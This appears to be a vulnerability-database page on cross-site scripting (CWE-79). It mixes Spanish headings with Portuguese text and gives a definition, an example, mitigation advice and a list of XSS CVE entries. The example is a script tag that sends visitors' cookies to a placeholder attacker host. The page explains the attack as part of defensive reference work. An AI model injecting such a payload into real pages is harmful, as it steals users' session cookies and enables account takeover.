Fallos del tipo CWE-79

29.250 resultados

Injeção de Script entre Sites (XSS)

Ocorre quando uma aplicação web insere dados não validados ou não escapados diretamente em páginas HTML, permitindo que um atacante injete código JavaScript malicioso. Esse script é executado no navegador da vítima, roubando cookies, tokens de autenticação ou realizando ações em nome do usuário.

Ejemplo

Um site de comentários que exibe a entrada do usuário sem sanitização: se alguém escreve <script>fetch('http://atacante.com/?cookie='+document.cookie)</script> como comentário, o navegador de quem visualiza executa o script e envia seus cookies para o atacante.

Cómo mitigar

Sempre escapar (ou codificar em HTML) dados vindos do usuário antes de renderizar: use funções como htmlspecialchars() em PHP, textContent ao invés de innerHTML em JavaScript, ou use templates que escapam por padrão (como Jinja2, Vue com v-text). Implemente Content Security Policy (CSP) como camada adicional de defesa.

CVE-2022-27503—Cross-site Scripting (XSS) vulnerability in Citrix StoreFront affects version 1912 before CU5 and version 3.12 before CU9EPSS 0.5%CVE-2022-29811MEDIUMIn JetBrains Hub before 2022.1.14638 stored XSS via project icon was possible.EPSS 0.5%CVE-2023-27489HIGHStored cross site scripting via SVG file upload in Kiwi TCMSEPSS 0.5%CVE-2025-34307MEDIUMIPFire < v2.29 Stored XSS via Default Country SearchEPSS 0.5%CVE-2024-12395MEDIUMWooCommerce Additional Fees On Checkout (Free) <= 1.4.7 - Reflected Cross-Site Scripting via 'number'EPSS 0.5%CVE-2025-34306MEDIUMIPFire < v2.29 Stored XSS via Default IP Search ValueEPSS 0.5%CVE-2016-15035LOWDoc2k RE-Chat re_chat.js cross site scriptingEPSS 0.5%CVE-2022-22511MEDIUMWAGO PLCs WBM vulnerable to reflected XSSEPSS 0.5%CVE-2024-50585MEDIUMReflected Cross-Site ScriptingEPSS 0.5%CVE-2025-9226MEDIUMStored XSSEPSS 0.5%CVE-2023-2014MEDIUMCross-site Scripting (XSS) - Generic in microweber/microweberEPSS 0.5%CVE-2024-1972LOWSourceCodester Online Job Portal EditProfile.php cross site scriptingEPSS 0.5%CVE-2025-49400CRITICALWordPress WP Visitor Statistics (Real Time Traffic) Plugin <= 8.2 - Cross Site Scripting (XSS) VulnerabilityEPSS 0.5%CVE-2024-22199CRITICALDjango Template Engine Vulnerable to XSSEPSS 0.5%CVE-2024-6810MEDIUMQuiz Organizer <= 2.9.1 - Authenticated (Administrator+) Stored Cross-Site ScriptingEPSS 0.5%CVE-2024-1825MEDIUMCodeAstro House Rental Management System User Registration Page cross site scriptingEPSS 0.5%CVE-2026-67237HIGHRabbitMQ: Reflected XSS via the OAuth bootstrap JS endpointEPSS 0.5%CVE-2026-55691HIGHEmbedVideo Extension : Stored XSS via unsanitized class passed to templateEPSS 0.5%CVE-2026-18325HIGHForminator Forms <= 1.56.1 - Unauthenticated Stored Cross-Site Scripting via Forged Upload Record via Select FieldEPSS 0.5%CVE-2025-49410CRITICALWordPress TC Testimonials plugin <= 1.1.1 - Cross Site Scripting (XSS) vulnerabilityEPSS 0.5%